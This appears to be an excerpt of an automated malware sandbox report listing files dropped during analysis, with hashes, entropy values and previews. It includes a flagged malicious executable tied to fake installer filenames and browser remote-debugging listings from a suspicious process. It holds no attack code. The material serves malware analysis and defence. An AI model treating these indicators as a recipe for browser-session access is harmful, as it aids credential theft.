                                                                                                                                                                                                                                                                                          Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                          MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                          SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                          SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                          SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):460992
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                          MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                          SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                          SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                          SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:uriCache_
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.030954886893601
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclRQQFRj:YWLSGTt1o9LuLgfGBPAzkVj/T8lW0j
                                                                                                                                                                                                                                                                                          MD5:B7C95BE495692143123CB1A5DCA61785
                                                                                                                                                                                                                                                                                          SHA1:936BB542D056B01973B4A77C14AFE13B11C2C272
                                                                                                                                                                                                                                                                                          SHA-256:607C1A7CD451C23192EC908F16C84E1B574D5B0A88028C01A65A99C2A030CB20
                                                                                                                                                                                                                                                                                          SHA-512:258746481623A69E6FCDB8D5E4AFB21DFBB5AE442BB7E6EDF6BAF755F46A2BC93C5AD0B6897145A5E65321F68B0E643B4E646FD38A4E36EA170FEBC5768B1C8C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734698757440432}]}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                          MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                          SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                          SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                          SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57639
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103863469391794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynv0PGWv/sxtw8j7VLyMV/YoskFoz:z/0+zI7ynvAv/4KeVeZoskG
                                                                                                                                                                                                                                                                                          MD5:21966544EA39ECE0EF894DABD250021A
                                                                                                                                                                                                                                                                                          SHA1:B242191EE85E7504818F5CFD38D32C50E3797F13
                                                                                                                                                                                                                                                                                          SHA-256:190CEE62F4EDDA4D6B9B977D8EAAC00AAA09FECFAF08E7323D81152708F4F23A
                                                                                                                                                                                                                                                                                          SHA-512:E17D3C20AA3A771766295ECC1B26FDCA41572CA1A492A830F201FDC340FC763264F1679803FA8B3C3E75CA2FA6C0AB0A3A628F8C8D5D09E7E01141A6359E87BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.851963858594624
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxNxl9Il8uwpLTZYL2ZEun//iWYzmy/30eFnIdd1rc:mYYaLNsIlKdmy8eFnIm
                                                                                                                                                                                                                                                                                          MD5:BF7454DA7BB91D9B49E92DFBA2336A1D
                                                                                                                                                                                                                                                                                          SHA1:2F373E24A5DC88DD21BD43AA2AA40B5CF0F7CFFB
                                                                                                                                                                                                                                                                                          SHA-256:7186F77CF99BDC3E6A7531B23CF5AD61CDE308169EDD836A02E87D54D06AABC0
                                                                                                                                                                                                                                                                                          SHA-512:1B101D96099C28676AF5AA4B4045EF993E9F68C7CDC0243AA772ED7396B18D36FAF5BB9121096EC357B0B254403088C519BA97C22E6EC134D09B8091DB202B0F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.G.L.3.z.P.p.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.1.e.N.R.z.b.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.0075887096847245
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxExtxD9Il8uwp7StB0JVy/CjI373dW0t/K6xbecFVcKQWB1s6sADAohaH3:jYMStT3ZrCQbecXc3WBa6nNXy7xz
                                                                                                                                                                                                                                                                                          MD5:DDB85C7F34A5B64BCD63DC6281210287
                                                                                                                                                                                                                                                                                          SHA1:645051EE0C0F734DC29E08C7FEF3972C2497705C
                                                                                                                                                                                                                                                                                          SHA-256:F912D49B3D10C7FDECEA5E74C39E5BDA2DDC2B525A9F2EB424F8B39929236092
                                                                                                                                                                                                                                                                                          SHA-512:7F44427CCC6A82377A3F8DF92529171EE8C6BB086CC65AD6A20A5D8971948F7E0883D4755F9436E6C381A71AB2B4B0A0CDD39EFBF51D5CE6C3462EDA01AF5F13
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".I.a.u.1.s.v.J.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.1.e.N.R.z.b.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.917459521741284
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xyxl9Il8uw17T0xdNnHUAWnGuQARNBSRLV23tgzZj7NACd/vc:agY0X0RMf/LAV2dSZj7K/
                                                                                                                                                                                                                                                                                          MD5:3470C7C105D67280DFD701B67F4D36D0
                                                                                                                                                                                                                                                                                          SHA1:3E596508583F2FE78B5D57D6F39C0EDEE72AA433
                                                                                                                                                                                                                                                                                          SHA-256:306C6940BFAD5D8961332DDBE6C189220F1DAE5B7F292ADFE84A2F2A126FC573
                                                                                                                                                                                                                                                                                          SHA-512:20D187DCAACB15F2341C4E8138A23D779EE723759C957A0D379C7CB463FDC6148BF4068A11162719A86F837677A833067C44D418A2B13D453BDA521692847FAB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.V.k.5.4.8.N.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.1.e.N.R.z.b.
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3500
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.39802946449214
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:6NnCyHCSNnC0bC8NnCc9C/NnC7G8dgEC74NnCGpCGSNnCoDCMNnCYwCcNnCH63CS:6NRN1N2NSnNLVSNH5NZONt
                                                                                                                                                                                                                                                                                          MD5:2B46EDFD845FBC313F2E14055053107C
                                                                                                                                                                                                                                                                                          SHA1:3DE0E79379402D7C7C9A03640A3195BCE52B1CD2
                                                                                                                                                                                                                                                                                          SHA-256:7B3A82EB50B242D3489CE96C8F3A836C9D05FF602B162EB59F428ABB095C7917
                                                                                                                                                                                                                                                                                          SHA-512:F19BD53F3601D21FEA77D82144BE4D44EBD1DA50BABBB353B5DC4E1255C3569EFC72404DE62EF4A6BBF2A051BAC1B80A1D072305B4553002C2D624C3A381C749
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/DF101E0C0243BC4C2FB434419857025F",.. "id": "DF101E0C0243BC4C2FB434419857025F",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/DF101E0C0243BC4C2FB434419857025F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/617D52857F7F8352B5CB1110D407ADE1",.. "id": "617D52857F7F8352B5CB1110D407ADE1",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/617D52857F7F8352B5CB1110D407ADE1"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.378251701847857
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCBTEC+fNaoCGkmCGZfNaoCJCsfNaoCw4MB0UrU0U8Cw4E:6NnCBTECmNnCUC8NnCJCYNnCpMB0UrU4
                                                                                                                                                                                                                                                                                          MD5:2D8A64D09570084E291BAEC50A226E58
                                                                                                                                                                                                                                                                                          SHA1:B9A3460413EB025BF96DBCA808C16190C67777BF
                                                                                                                                                                                                                                                                                          SHA-256:375A558BC0D0CB6D83633D374879832DEA75DD93BED752D7A0BD120AB2FFEA91
                                                                                                                                                                                                                                                                                          SHA-512:AAF2F04B1349D415DB514D52A3D8DD63A1BD7A1AA3E1B0C07776A49D43422A2F1F8D844933556FB7D69711277F6FCF09AB76CD0DCD6D5DC82023E59F89608D87
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/21716D8ED624605CF4B4FFDF7FFFB930",.. "id": "21716D8ED624605CF4B4FFDF7FFFB930",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/21716D8ED624605CF4B4FFDF7FFFB930"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/0FF9774EBCE0FEB9FB3D70CE9E8711CE",.. "id": "0FF9774EBCE0FEB9FB3D70CE9E8711CE",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/0FF9774EBCE0FEB9FB3D70CE9E8711CE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                                          • Filename: QIo3SytSZA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: 69633f.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: fm2r286nqT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: nB52P46OJD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):271902
